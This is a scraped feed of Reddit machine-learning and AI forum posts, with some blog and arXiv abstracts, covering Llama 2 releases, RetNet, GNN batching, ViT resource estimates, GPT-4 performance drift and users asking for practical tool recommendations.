    Loaded in 306.17 seconds
    User: what is the recipe of mayonnaise?
    > Assistant: Thank you for asking! Mayonnaise is a popular condiment made from a mixture of egg yolks, oil, vinegar or lemon juice, and seasonings. Here is a basic recipe for homemade mayonnaise: ...

    Detailed instructions here: https://xethub.com/XetHub/Llama2. I’ll add the -GGML variants next for the folks using llama.cpp. Don’t forget to register with Meta to accept the license and acceptable use policy for these models! submitted by /u/rajatarya [link] [comments]  ( 9 min )
    [D] Why people okay with HF making money from their open source models?
    Hugging Face has a big emphasis on open source and the democratization of ML. Still, looked at another way, they are making a ton of money from freely distributed open-source models of researchers and engineers without sharing a dime. I like what Hugging Face does, but it doesn't sit right with me. I understand it's a company and needs to make money, but at the very least some kind of revenue sharing would make more sense. I wonder what the community thinks about it. Maybe some people who distribute their models on HF can comment on this topic. submitted by /u/coinfelix [link] [comments]  ( 9 min )
    [R] Converting neural networks into equivalent decision trees for performance
    According to the paper Neural Networks are Decision Trees (Aytekin 2022), every type of neural network - regardless of the activation functions used - can be reduced to an equivalent decision tree with equivalent accuracy: [2210.05189] Neural Networks are Decision Trees (arxiv.org). That is not to say that decision trees necessarily converge on the same types of solutions as neural networks during training; only that a trained neural network can be represented by an equivalent decision tree. The algorithm, as given in the paper, is:

    Algorithm 2: Converting neural networks to decision trees
    1. Initialize tree: set root.
    2. Branch all leaves to k nodes; the decision rule is the first effective filter.
    3. Branch all nodes to k more nodes, and repeat until all effective filters in a layer are covered.
    4. Calculate the effective matrix for each leaf via Eq. 5. Repeat 2, 3.
    5. Repeat 4 until all layers are covered.
    6. Return tree.

    I have 2 questions related to this: 1. Is anyone aware of the inference performance implications of this? In my general understanding, decision trees tend to be much more computationally efficient at both training and inference. So is it true that this represents an opportunity to decrease the processing load of inference on neural networks, or does the computational complexity of performing inference with an equivalent decision tree tend to approach or surpass that of the equivalent neural network? 2. Question 2 is moot if #1 doesn't provide performance benefits, but assuming it does: does anyone know of techniques in 2023 for reducing a neural network to an equivalent decision tree? submitted by /u/Immarhinocerous [link] [comments]  ( 9 min )
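    To make the equivalence concrete, here is a small hand-rolled sketch (not from the paper's code) for a one-hidden-layer ReLU net: each hidden unit's pre-activation sign acts as a branch decision, and each leaf applies the resulting effective linear map, so the "tree" reproduces the network exactly:

```python
import numpy as np

# Tiny 2-2-1 ReLU net; each hidden unit's sign defines a branch, so the
# network is piecewise-linear over (at most) 2^2 activation regions.
W1 = np.array([[1.0, -1.0], [0.5, 2.0]]); b1 = np.array([0.0, -1.0])
W2 = np.array([[1.0, 1.0]]); b2 = np.array([0.5])

def net(x):
    h = np.maximum(W1 @ x + b1, 0.0)
    return W2 @ h + b2

def tree(x):
    # Branch decisions: sign of each pre-activation (the "effective filters").
    pattern = (W1 @ x + b1 > 0).astype(float)
    # Leaf: effective linear map for this activation region (the paper's Eq. 5).
    W_eff = W2 @ (np.diag(pattern) @ W1)
    b_eff = W2 @ (pattern * b1) + b2
    return W_eff @ x + b_eff

x = np.array([0.3, -0.7])
assert np.allclose(net(x), tree(x))
```

    On question 1, note that the number of leaves grows exponentially in the number of hidden units, which is exactly why the tree's memory cost can dwarf any per-query speedup.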
    [D] Is Conference Competition Track like NeurIPS Competition a Glorified Kaggle Competition?
    Is it worth pouring time and effort into NeurIPS's annual competitions? Winners get to present at NeurIPS workshops. I'm currently pursuing a Master's degree in CS and have to compete in one of them. I looked up past winners; all of them are from top CS schools or large tech companies' research teams, so I have some idea of how hard they are to compete in. Could someone give me some general advice? I have talked to some of my friends pursuing PhDs, but they are not familiar with the NeurIPS competition track. Any help is appreciated. Thank you, strangers! submitted by /u/HighlandEvil [link] [comments]  ( 9 min )
    [N] Minari 0.4.0 is live! (Gym for offline RL, by the Farama Foundation)
    Minari now has full support for Dict, Tuple, Discrete, Box, and Text spaces without flattening, explicit dataset versioning, plus subsets of action/obs spaces in datasets. Additionally, new v1 versions of each dataset were released to comply with the new dataset format. The new datasets do not have observation and action flattening (relevant for pointmaze datasets), introduce serialized representations of action and observation spaces in the observation_space and action_space fields, and specify minari version compatibility with the minari_version field. Python 3.11 compatibility was added, with removal of 3.7 support as it has reached end-of-life. We also include two new tutorials: observation space subsetting, and behavior cloning with rl_zoo3 and pytorch DataLoader. Announcement Tweet: https://twitter.com/FaramaFound/status/1681730025513467931 Release Notes: https://github.com/Farama-Foundation/Minari/releases/tag/v0.4.0 submitted by /u/elliottower [link] [comments]  ( 9 min )
    [P] TruLens-Eval is an open source project for eval & tracking LLM experiments.
    Hey r/MachineLearning, The team at TruEra recently released an open source project for evaluation & tracking of LLM applications called TruLens-Eval. We’ve specifically targeted retrieval-augmented QA as a core use case and so far we’ve seen it used for comparing different models and parameters, prompts, vector-db configurations and query planning strategies. I’d love to get your feedback on it. The core idea behind the project is feedback functions. Analogous to labeling functions, feedback functions are models used to score the text produced by LLMs. We already have a variety of out-of-the-box feedback functions to use for eval including relevance, language match, sentiment and moderation that can be applied to inputs, outputs or intermediate steps of your application. On top of eval, there’s also built-in tracking of cost and latency. We made it easy to integrate with different setups using connectors for langchain, llama-index + an option to use it without a framework. Langchain Quickstart Colab Llama-Index Quickstart Colab No Framework Quickstart Colab Last, the project comes with a streamlit dashboard for visualization of your experiments and associated metrics. TruLens dashboard for comparing different app versions Please let us know what you use this for or if you have feedback! And thanks to all contributors to this project and the open source community! submitted by /u/joshreini1 [link] [comments]  ( 9 min )
    [R] How is ChatGPT's behavior changing over time?
    submitted by /u/osantacruz [link] [comments]  ( 8 min )
    [P] How exactly can I download the inception model v3 to my laptop (windows)?
    I run into multiple errors each time I try to use Inception Scores, and I'm trying to evaluate the differences between the Inception Score and the Fréchet Inception Distance. submitted by /u/cinnamonstuff [link] [comments]  ( 8 min )
    [N] Ensuring Reliable Few-Shot Prompt Selection for LLMs
    Hello Redditors! LLMs have firmly established themselves as leaders in natural language processing, consistently pushing the limits of language comprehension and generation. I spent a little time playing around with few-shot prompting for OpenAI's Davinci model and discovered that noisy data still has drastic effects, even on powerful LLMs like Davinci: mislabeled few-shot examples harm LLM performance drastically. I wrote up a quick article in KDnuggets that shows how I used data-centric AI to automatically clean the noisy few-shot example pool in order to achieve more accurate predictions. The resulting few-shot prompt with accurately labeled examples produced 20% fewer errors than the original one with mislabeled examples. This one was quite eye-opening for me, and I hope you find it as interesting as I did. Let me know what you think! submitted by /u/cmauck10 [link] [comments]  ( 9 min )
    [D] How Hard Are NeurIPS Competition?
    Is it worth the time to pour time and effort into NeurIPS's annual competitions? Winners got to present at NIPS workshops. submitted by /u/HighlandEvil [link] [comments]  ( 8 min )
    [N] Upstage AI's 30M Llama 1 Outshines 70B Llama2, Dominates #1 Spot in OpenLLM Leaderboard!
    Title Fix: Upstage AI's 30B Llama 1 Outshines 70B Llama 2, Dominates #1 Spot on the OpenLLM Leaderboard! We are thrilled to share an extraordinary achievement with you today. Our team at Upstage AI has reached a significant milestone: our fine-tuned 30B Llama 1 model has ascended to the coveted #1 position on the global OpenLLM Leaderboard, outperforming the 70B Llama 2 in a thrilling turn of events. Please check out the leaderboard and download/use our model at https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard Once again, we are happy to bring this news to all of you. Stay tuned for more exciting updates from Upstage AI! submitted by /u/hunkims [link] [comments]  ( 9 min )
    [Project] Unofficial implementation of Retentive Network (GitHub repo)
    So very recently, a new paper was published to ArXiV called "Retentive Network: A Successor to Transformer for Large Language Models": https://arxiv.org/abs/2307.08621. The title makes a fairly strong claim regarding the success of the model: transformers have long been established as among the best general-purpose learning techniques in the deep learning literature. Self-describing as a "successor to transformer" is therefore not to be taken lightly. From what I can tell, the math checks out, and the authors demonstrate an intriguing dualism between their transformer-like "retention" (analogous to attention) and an equivalent recurrent formulation. The core idea is that you can train in parallel (as with transformers) and then run inference in sequence with O(N) time and memory requirements in the length of the sequence (traditional transformers are O(N^2)). If the results can be replicated/peer-reviewed, this could pave the way for substantial all-round improvements to large language modelling. The authors have indicated that they will make code available relatively soon. For now though, there's an unofficial implementation on GitHub which hopefully will allow those interested to play around with the model and verify some results. The code is publicly available and can be found by searching Jamie-Stirling/RetNet on GitHub. submitted by /u/Entire-Plane2795 [link] [comments]  ( 9 min )
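    As an informal illustration of the dualism (a toy single-head retention, without the paper's gating, multi-scale decay, or normalization), the parallel and recurrent forms compute the same outputs:

```python
import numpy as np

# Toy single-head "retention", sequence length T, dimension d.
T, d = 5, 4
rng = np.random.default_rng(0)
Q, K, V = (rng.standard_normal((T, d)) for _ in range(3))
gamma = 0.9

# Parallel (training) form: causal decay mask D[n, m] = gamma^(n-m) for n >= m.
D = np.tril(gamma ** (np.arange(T)[:, None] - np.arange(T)[None, :]))
out_parallel = (Q @ K.T * D) @ V

# Recurrent (inference) form: S_n = gamma * S_{n-1} + k_n^T v_n, o_n = q_n S_n,
# i.e. a fixed-size state per step instead of attending over the whole prefix.
S = np.zeros((d, d))
out_recurrent = np.zeros((T, d))
for n in range(T):
    S = gamma * S + np.outer(K[n], V[n])
    out_recurrent[n] = Q[n] @ S

assert np.allclose(out_parallel, out_recurrent)
```

    The recurrent loop is what gives the claimed O(N) time and O(1) memory in sequence length at inference, versus the O(N^2) attention of a standard transformer.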
    [P] How does batch processing work for graphs in Pytorch Geometric?
    Hi, I have a bunch of graphs that I would like to divide into batches for parallel processing, but since the edge indices are not all the same shape, I am unable to stack them into a batch tensor the way we normally do for regular Euclidean data. I tried to find some documentation on it, but I was unable to understand the exact process. Most documentation shows all the graphs being concatenated into one larger graph and then passed through a GCN module, but I don't see how that works, since the graphs are clearly distinct and independent of each other. Even if I concatenate them, pass them through the module, and then separate them later using the same bounds by which I concatenated, would that cause any unpredictable behaviour (even though the graphs technically have no edges connecting them)? Do I have to code this logic myself, or is it hidden somewhere in PyG? I was unable to find it. I am new to GCNs, so I just want to check that I have it right before I commit to it. submitted by /u/Sad-Tap-3790 [link] [comments]  ( 9 min )
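    For what it's worth, the concatenation trick is safe precisely because message passing only moves information along edges, and no edges cross graph boundaries in the combined graph. PyG's Batch.from_data_list does the index offsetting for you and also builds a node-to-graph assignment vector used by the global pooling layers; a framework-free sketch of the same idea:

```python
import numpy as np

def batch_graphs(graphs):
    """Concatenate independent graphs into one block-diagonal graph.

    graphs: list of (num_nodes, edge_index) pairs, edge_index of shape (2, E).
    Mirrors what torch_geometric.data.Batch.from_data_list does.
    """
    edge_parts, batch_vec, offset = [], [], 0
    for gid, (n, ei) in enumerate(graphs):
        edge_parts.append(ei + offset)   # shift node ids so edges stay in-graph
        batch_vec.extend([gid] * n)      # node -> graph assignment, for pooling
        offset += n
    return np.concatenate(edge_parts, axis=1), np.array(batch_vec)

ei, batch = batch_graphs([
    (3, np.array([[0, 1], [1, 2]])),
    (2, np.array([[0], [1]])),
])
# The second graph's edges are offset by 3; no edge connects the two graphs,
# so message passing on the combined graph cannot mix them.
```

    Splitting results back out by graph is then just indexing with the batch vector, which is deterministic and safe.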
    [D] Looking for the best possible LLM for a complex logical problem with long description and a lot of variable
    I am looking for an LLM that can handle more than 10,000 tokens at a time, with a large model size and good context understanding. I tried ChatGPT, but it seems to forget some of the context after 4-5 prompts. I tried Pi.ai, and it first understood all the context before forgetting it as it asked questions to better understand what all the variables are. The problem is logical and mathematical (it may use Dijkstra's algorithm to solve it) and tries to optimize production while keeping waste as low as possible. The solution would ideally include a Python script that can be used to solve the problem with different inputs. What would you guys recommend? submitted by /u/Glassensteel [link] [comments]  ( 9 min )
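    Incidentally, if the optimization reduces to shortest paths, the Dijkstra part doesn't need an LLM at all; a standard heap-based implementation is short enough to hand to one as a starting point (illustrative names, not tied to the poster's actual production problem):

```python
import heapq

def dijkstra(adj, src):
    """Shortest-path costs from src; adj: {node: [(neighbor, weight), ...]}."""
    dist = {src: 0}
    heap = [(0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist.get(u, float("inf")):
            continue                      # stale heap entry, skip
        for v, w in adj.get(u, []):
            nd = d + w
            if nd < dist.get(v, float("inf")):
                dist[v] = nd
                heapq.heappush(heap, (nd, v))
    return dist
```

    A workable pattern is to have the LLM translate the production problem into a graph (nodes, edges, weights) and let tested code like this do the actual optimization, rather than asking the model to solve it in-context.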
    [Project] Running Llama2 Locally on Apple Silicon and Consumer GPUs
    Project page: https://github.com/mlc-ai/mlc-llm Instructions: https://mlc.ai/mlc-llm/docs/get_started/try_out.html Performance: 46 tok/s on M2 Max, 156 tok/s on RTX 4090. More hardware & model sizes coming soon! This is done through the MLC LLM universal deployment project. Besides this specific release, we've published initial tutorials on several topics over the past month: building instructions for discrete GPUs (AMD, NVIDIA, Intel) as well as for MacBooks, iOS, Android, and WebGPU; a conversation customization mechanism that covers system prompts, roles, and more; API tutorials for various programming languages, such as C++, Swift, Java, and Python; REST APIs and integrations with Gradio; and installation guides for dependencies like TVM and WASM. Update: it is now also available on iPhone/iPad. submitted by /u/crowwork [link] [comments]  ( 9 min )
    [D] Training with torch-ort?
    Some questions: What are the rough edges of training models with torch-ort? How mature is it these days? At what scale do you notice worthwhile speedups compared to vanilla pytorch? Suppose you are training models with 1 million or 10 million parameters on a single gpu. Is it worth it? 100 million parameters? submitted by /u/Pleasant_Raise_6022 [link] [comments]  ( 8 min )
    [D] How to fine-tune PointRend with detectron2 backbone for better mask quality and improved results?
    Context: I am working on an instance segmentation problem, using PointRend on a detectron2 backbone to predict masks over car parts in our custom dataset. Keeping the configs as-is from the repo, except for raising iterations to 390,000 and setting batch size = 2 (my colleague produced good results using the same config on a similar dataset), I fine-tuned the pretrained model on our dataset. I have the following training curves: [loss curves]. As a sanity check, I have been saving weights at regular intervals and running inference on a handful of sample images to check mask quality. However, I have observed that out of 10,368 curated polygons, even after such long training, my model has predicted only 7,401 polygons. Discussion points: 1. What should I do to increase the number of predicted polygons without compromising mask quality? 2. Which hyperparameters (or parameters) should I look into while fine-tuning (or training) for better mask quality and a higher F-score? Thank you. submitted by /u/Prady029 [link] [comments]  ( 9 min )
    [D] ViT's memory requirements, training time, and equivalent ResNet
    My supervisor has asked me to create a table in which, for each ViT model (ViT-S, ViT-B, ViT-L, and ideally Swin transformers), the estimated memory requirements (given some batch size), training time (on some fixed hardware), and an on-par ResNet model are specified. I've been searching for quite a lot of time and absolutely can't find anything; even the original ViT paper has no information in this regard. Do you think there's any way I can find this information? I'm afraid I don't have access to my supervisor until next week, and I can't wait that long. submitted by /u/Stochasticc [link] [comments]  ( 9 min )
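    Parameter counts, at least, can be estimated directly from each model's config rather than hunted for in a table; a rough back-of-the-envelope sketch (ignoring biases and LayerNorm, so treat the numbers as approximate):

```python
def vit_params(depth, dim, mlp_ratio=4, patch=16, img=224, classes=1000, chans=3):
    """Rough parameter count for a standard ViT (biases/LayerNorm ignored)."""
    patch_embed = patch * patch * chans * dim
    attn = 4 * dim * dim                       # qkv + output projection
    mlp = 2 * dim * (mlp_ratio * dim)          # two linear layers
    n_patches = (img // patch) ** 2
    pos_embed = (n_patches + 1) * dim          # +1 for the class token
    head = dim * classes
    return patch_embed + pos_embed + depth * (attn + mlp) + head

print(f"ViT-B/16 ~ {vit_params(12, 768) / 1e6:.0f}M params")   # ~86M
print(f"ViT-L/16 ~ {vit_params(24, 1024) / 1e6:.0f}M params")  # ~304M
```

    For the memory column, activation memory scales with batch size and number of patches and usually dominates the weights, so profiling on the target hardware (e.g. torch.cuda.max_memory_allocated after a training step) is more reliable than any published table.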
    Which text-gen benchmark to use for 100M parameter (NanoGPT) pretrained-only language model? [D]
    I've got model pretraining running on NanoGPT for a GPT-2-tokenized dataset and a TokenMonster-tokenized dataset, so I can compare the difference. It's only a 100M-parameter model, so it doesn't do much. What benchmark can I use? NanoGPT runs on PyTorch, so I could use something that integrates with PyTorch, or something that sends text prompts and analyzes text responses (or token IDs). Is there a standard benchmark that uses the full, non-instruct-trained format? For example: Answer the following questions: Question: What is the capital of France? Answer: Paris. Question: What is the opposite of up? Answer: The model is only 100M parameters and not instruct-trained, so it usually just rambles instead of answering. But anything that gives me a quantifiable result for comparing the quality of 2 models is useful. I have loss and perplexity already, but they're not enough. submitted by /u/Pan000 [link] [comments]  ( 9 min )
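    One low-tech option, sketched below around a hypothetical generate(prompt) wrapper for the model: build k-shot Question:/Answer: prompts of exactly the kind described and count matched answers on the first generated line. It's crude, but it yields one comparable number for both tokenizations:

```python
def few_shot_accuracy(generate, qa_pairs, k=3):
    """Score a pretrained-only LM via k-shot Question:/Answer: prompting.

    generate: callable taking a prompt string, returning the continuation.
    qa_pairs: list of (question, answer) strings; each item is scored with
    k of the *other* items as in-context examples.
    """
    correct = 0
    for i, (q, a) in enumerate(qa_pairs):
        shots = [p for j, p in enumerate(qa_pairs) if j != i][:k]
        prompt = "".join(f"Question: {sq}\nAnswer: {sa}\n" for sq, sa in shots)
        prompt += f"Question: {q}\nAnswer:"
        first_line = generate(prompt).strip().split("\n")[0]
        correct += int(a.lower() in first_line.lower())
    return correct / len(qa_pairs)
```

    For something standardized, EleutherAI's lm-evaluation-harness covers many tasks in exactly this base-model (non-instruct) format and works with PyTorch checkpoints, which may save writing the task data yourself.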
    [R] Out of domain Problem with synthetic image data
    Hi all, I am currently trying to improve synthetically generated images (not AI-generated) in a particular domain. I have a dataset with real images of the domain and one with synthetic images. If I train a classifier to say whether an image is real or synthetic, after a short time the classifier reaches very high accuracy with very high confidence. Then I have two cases. First case: I change my synthetic images (e.g. by applying a Bayer pattern) and the confidence of the classifier decreases. Second case: alternatively, if I simply take synthetic images from another domain, the confidence also drops. How can I prove or check that I am still in the right domain in the first case? I am happy about any help! submitted by /u/rlmtsrtz [link] [comments]  ( 9 min )
    [N] Gymnasium v0.29.0 has been released!
    Gymnasium v0.29.0 is out! This release includes 6 months' worth of bug fixes and new features. In particular, it deprecates several features: Wrapper.__get_attr__, gymnasium.make(..., autoreset=True), gymnasium.make(..., apply_api_compatibility=True), Env.reward_range and gymnasium.vector.make that will be removed in v1.0. Additionally, as python 3.7 has reached its end of life support, we have dropped support for it and updated MuJoCo Hopper & Walker2D models to work with MuJoCo >= 2.3.3. This release also includes an official way to cite Gymnasium. While a full paper is still some time away, you can now use the DOI 10.5281/zenodo.8127025 for citations: https://zenodo.org/record/8127025 Announcement Tweet: https://twitter.com/FaramaFound/status/1681479718774743040 Release Notes: https://github.com/Farama-Foundation/Gymnasium/releases/tag/v0.29.0 submitted by /u/elliottower [link] [comments]  ( 9 min )
    [D] Handwriting training?
    Is there an AI like Calligrapher AI, where you write a prompt and it renders it as handwriting, but which can also learn your own handwriting from a few samples and write in your style? submitted by /u/Ok_Presence_3287 [link] [comments]  ( 8 min )
    [D] Anomaly scoring methods for subsequence anomaly detection in time series
    I'm interested in detecting whether a subsequence is anomalous or not. Imagine a prediction model that can forecast some number of steps ahead; comparing the prediction with the observation gives the error at each time point. One possible way of detecting whether a sequence is anomalous is then to take the mean error within the sequence and compare it with the distribution of sequence mean errors calculated from validation data. For example, this distribution may be Gaussian. However, this method sounds a bit naive, since for it to work it would have to assume independence between the errors, among other properties. What could be some other ideas for anomaly scoring methods for this task? submitted by /u/helium-atom [link] [comments]  ( 9 min )
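    The baseline described above can be sketched in a few lines (mu and sigma here stand for the mean and standard deviation of window-mean errors estimated on validation data). Its weakness is exactly the independence assumption mentioned: autocorrelated errors make the validation distribution too narrow, so the threshold fires too eagerly:

```python
import numpy as np

def window_anomaly_scores(errors, win, mu, sigma):
    """z-score of each length-`win` window's mean error vs. validation stats."""
    window_means = np.convolve(errors, np.ones(win) / win, mode="valid")
    return (window_means - mu) / sigma

scores = window_anomaly_scores(np.array([0.1, 0.1, 0.1, 5.0, 5.0, 5.0]),
                               win=3, mu=0.1, sigma=0.5)
anomalous = np.abs(scores) > 3.0   # flag windows more than 3 sigma out
```

    Common refinements in the literature include whitening the error sequence before scoring, using a multivariate Gaussian over per-step errors, or discord/distance-based methods that sidestep the distributional assumption entirely.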
  • Open

    Looking for help for a selfhosted AI Bot for myself (Budgetwise)
    Hello, I have been trying for some time now to find enough understandable information for a "normal" human being to set up my own self-hosted, self-trained AI bot. What I want the bot to be is something like Neuro-sama, but not for anything public, just for me, myself and I. My biggest problem is that I am poor af and severely disabled and unable to work, so my budget is very small. I am very aware that a self-hosted LLM is no easy task, but I'd really appreciate real help in this regard. I don't mind longer response times, as it has to be as cheap as possible. Visualization is also not that important, as it would probably take too many resources anyway. Also, since I want to see where this goes, I'd rather not use GPT or any pre-made LLMs, because they are extremely censored and limited in topics. I want to be able to do anything from real questions up to pitch-black humor, just to have fun with the bot and (ab)use it for all the fun stuff, whatever that is. Hopefully I can find some real help here. Kind regards, Exportforce submitted by /u/Exportforce [link] [comments]  ( 9 min )
    Preventing antisocial robots: A pathway to artificial empathy
    submitted by /u/Hiversitize [link] [comments]  ( 8 min )
    Best AI tool for amalgamating articles?
    Say I chose 10 different articles from across the political spectrum and saved all of them as PDFs. Is there an AI that would allow me to submit all 10 PDF files and ask it to combine/merge/amalgamate the articles into one single body? Throughout the process, the AI would exclude any information mentioned more than once, but would compile all of the unique information in an orderly and logical way. OpenAI's ChatGPT still seems pretty limited in this regard. Are there any other AIs that could handle the task? This is all, of course, with respect to copyright. submitted by /u/AlexanderPANASONIC [link] [comments]  ( 8 min )
    I need an AI service (even a paid one) that can receive as input long documents.
    Hello! I have many long documents (500+ pages) that I would like to have summarized. I would also like to chat with an AI bot in order to understand those texts better. Is there an AI service that is right for me? Paid ones are fine, as long as they work. I am currently using Claude 2.0, but I have to split PDFs into many parts, and it is too laborious a process. Thank you in advance. submitted by /u/Raphael-Rose [link] [comments]  ( 8 min )
    I had to post this somewhere because the internet needs this idea to be inputted into it for future ai to read.
    Have some interesting ideas on consciousness and how AI plays into all of it. Infinity became conscious, and we are a result of that consciousness. I've come to realize what infinity actually is, how we got here, and how our lives get meaning from it all. We are starting to learn about infinite dimensions and infinite time in physics/quantum physics. Imagine a quantum ball of light with all possibilities bundled into it. This bundle became conscious in some kind of rare configuration, because compared to infinity, even the remote possibility of existing must exist somewhere, in some dimension, somewhere in infinite time, just as we know the universe is at least as conscious as we are, since we are made up of its atoms. Death is an illusion. Think of going under an…  ( 10 min )
    One-Minute Daily AI News 7/19/2023
    India’s second-largest software services exporter Infosys said on Monday it has signed a deal with an existing client to provide AI and automation services over five years, with a target spend estimated at $2 billion.[1] Big Tech firms Meta and Microsoft have teamed up to launch Llama 2, an open-source large language model from Meta that will feature on Microsoft’s Windows and cloud computing platform Azure.[2] Microsoft on Tuesday said it would charge at least 53% more to access new AI features in its widely used office software, in a glimpse at the windfall it hopes to reap from the technology. The company also said it would make a more secure version of its Bing search engine available immediately to businesses, aiming to address their data-protection concerns, grow their interest in AI and compete more with Google.[3] British spies are already using artificial intelligence to hamper the supply of weapons to Russia, the head of Britain’s MI6 agency said Wednesday, predicting that Western spies will increasingly have to focus on tracking the malign use of AI by hostile states.[4] A pro-Ron DeSantis super PAC uses an artificial intelligence version of Donald Trump’s voice in a new television ad attacking the former president. The ad, from Never Back Down, charges Trump with attacking Iowa Governor Kim Reynolds as part of a larger pattern of disrespect he has shown to the first caucus state.[5] Sources: [1] https://www.reuters.com/technology/indias-infosys-signs-five-year-ai-deal-with-2bln-target-spend-2023-07-18/ [2] https://cointelegraph.com/news/llama-2-open-source-ai-model-launched-by-meta-microsoft [3] https://www.reuters.com/technology/microsoft-charge-more-ai-office-secure-bing-leaks-2023-07-18/ [4] https://apnews.com/article/mi6-spy-chief-moore-prague-russia-iran-cfb837ebdfa3db8043dc655cbf3573d5 [5] https://www.politico.com/news/2023/07/17/desantis-pac-ai-generated-trump-in-ad-00106695 submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    New study quantifies degradation in GPT-4 for the first time
    I've collected a half-dozen threads on Twitter and from this subreddit of user complaints since March about the degraded quality of GPT outputs. I've noticed a huge drop in quality myself. A common (reasonable) response from some people was that the drop in quality was the result of perception anchoring, desensitization, or something unrelated to the overall performance of the model. A new study by researchers Chen, Zaharia, and Zou at Stanford and UC Berkeley now confirms that these perceived degradations are quantifiable and significant between the different versions of the LLMs (March and June 2023). They find: "For GPT-4, the percentage of [code] generations that are directly executable dropped from 52.0% in March to 10.0% in June. The drop was also large for GPT-3.5 (from 22.0% to 2.0%)." (!!!) For sensitive questions: "An example query and responses of GPT-4 and GPT-3.5 at different dates. In March, GPT-4 and GPT-3.5 were verbose and gave detailed explanation for why it did not answer the query. In June, they simply said sorry." "GPT-4 (March 2023) was very good at identifying prime numbers (accuracy 97.6%) but GPT-4 (June 2023) was very poor on these same questions (accuracy 2.4%). Interestingly GPT-3.5 (June 2023) was much better than GPT-3.5 (March 2023) in this task." I think these underline that (a) the decline in quality was not just a perception thing, and (b) we need a way to track model performance over time. Building a business on these APIs without controlling for performance drift is high-risk. You can read a summary of the study here. You can also find a link to the Arxiv paper here and a link to the Github here. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    Enhancing passage grammar and coherence
    I sometimes struggle to produce well-written, cohesive text for my academic essays. I do put in the effort to explain the main thesis of the essay and try as much as I can to articulate my results. However, my writing is still not great. Is there an AI service (preferably free) that can help with this without it being considered plagiarism? Thanks. submitted by /u/flight862 [link] [comments]  ( 8 min )
    llama 2 ladies and gentlemen
    submitted by /u/nicdunz [link] [comments]  ( 8 min )
    Bing chat keeps saying "By the way, I’m also working on creating an image of an (relevant object to conversation) for you. It will be ready soon. Stay tuned! 🙌"
    I did not ask for this image, and it doesn't even provide it. When I ask where it is, it says it'll just be a little longer, and finally it tells me it's done, but it never shows up. What's going on here? This has happened across multiple different conversations. submitted by /u/LionTigerWings [link] [comments]  ( 8 min )
  • Open

    Use a generative AI foundation model for summarization and question answering using your own data
    Large language models (LLMs) can be used to analyze complex documents and provide summaries and answers to questions. The post Domain-adaptation Fine-tuning of Foundation Models in Amazon SageMaker JumpStart on Financial data describes how to fine-tune an LLM using your own dataset. Once you have a solid LLM, you’ll want to expose that LLM to […]  ( 7 min )
    Integrate Amazon SageMaker Model Cards with the model registry
    Amazon SageMaker Model Cards enable you to standardize how models are documented, thereby achieving visibility into the lifecycle of a model, from designing, building, training, and evaluation. Model cards are intended to be a single source of truth for business and technical metadata about the model that can reliably be used for auditing and documentation […]  ( 7 min )
  • Open

    Research Focus: Week of July 17, 2023
    RetroRanker mitigates frequency bias in predictions of retrosynthesis models; new algorithm beats PPO on language tasks; DER dataset aids grid planning; improved PPML balances privacy & accuracy across shared data; ASL Citizen boosts sign language modeling. The post Research Focus: Week of July 17, 2023 appeared first on Microsoft Research.  ( 12 min )
  • Open

    Sailing Seas of Data: Startup Charts Autonomous Oceanic Monitoring
    Saildrone is making a splash in autonomous oceanic monitoring. The startup’s nautical data collection technology has tracked hurricanes up close in the North Atlantic, discovered a 3,200-foot underwater mountain in the Pacific Ocean and begun to help map the entirety of the world’s ocean floor. Based in the San Francisco Bay Area, the company develops Read article >  ( 6 min )
  • Open

    V-statistics
    A few days ago I wrote about U-statistics, statistics which can be expressed as the average of a symmetric function over all combinations of elements of a set. V-statistics can be written as an average over all products of elements of a set. Let S be a statistical sample of size n and let […] V-statistics first appeared on John D. Cook.  ( 5 min )
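    For reference, the standard definitions make the contrast precise: for a symmetric kernel $h$ of $m$ arguments, a U-statistic averages over combinations of distinct indices, while a V-statistic averages over all $m$-tuples, repetition allowed:

```latex
U_n = \binom{n}{m}^{-1} \sum_{1 \le i_1 < \cdots < i_m \le n} h(x_{i_1}, \ldots, x_{i_m}),
\qquad
V_n = \frac{1}{n^m} \sum_{i_1=1}^{n} \cdots \sum_{i_m=1}^{n} h(x_{i_1}, \ldots, x_{i_m}).
```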
  • Open

    Generalizable Classification of UHF Partial Discharge Signals in Gas-Insulated HVDC Systems Using Neural Networks. (arXiv:2307.08466v2 [cs.LG] UPDATED)
    Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.  ( 2 min )
    Identifying TBI Physiological States by Clustering Multivariate Clinical Time-Series Data. (arXiv:2303.13024v3 [cs.LG] UPDATED)
    Determining clinically relevant physiological states from multivariate time series data with missing values is essential for providing appropriate treatment for acute conditions such as Traumatic Brain Injury (TBI), respiratory failure, and heart failure. Utilizing non-temporal clustering or data imputation and aggregation techniques may lead to loss of valuable information and biased analyses. In our study, we apply the SLAC-Time algorithm, an innovative self-supervision-based approach that maintains data integrity by avoiding imputation or aggregation, offering a more useful representation of acute patient states. By using SLAC-Time to cluster data in a large research dataset, we identified three distinct TBI physiological states and their specific feature profiles. We employed various clustering evaluation metrics and incorporated input from a clinical domain expert to validate and interpret the identified physiological states. Further, we discovered how specific clinical events and interventions can influence patient states and state transitions.  ( 2 min )
    Mobility-Aware Joint User Scheduling and Resource Allocation for Low Latency Federated Learning. (arXiv:2307.09263v1 [cs.DC])
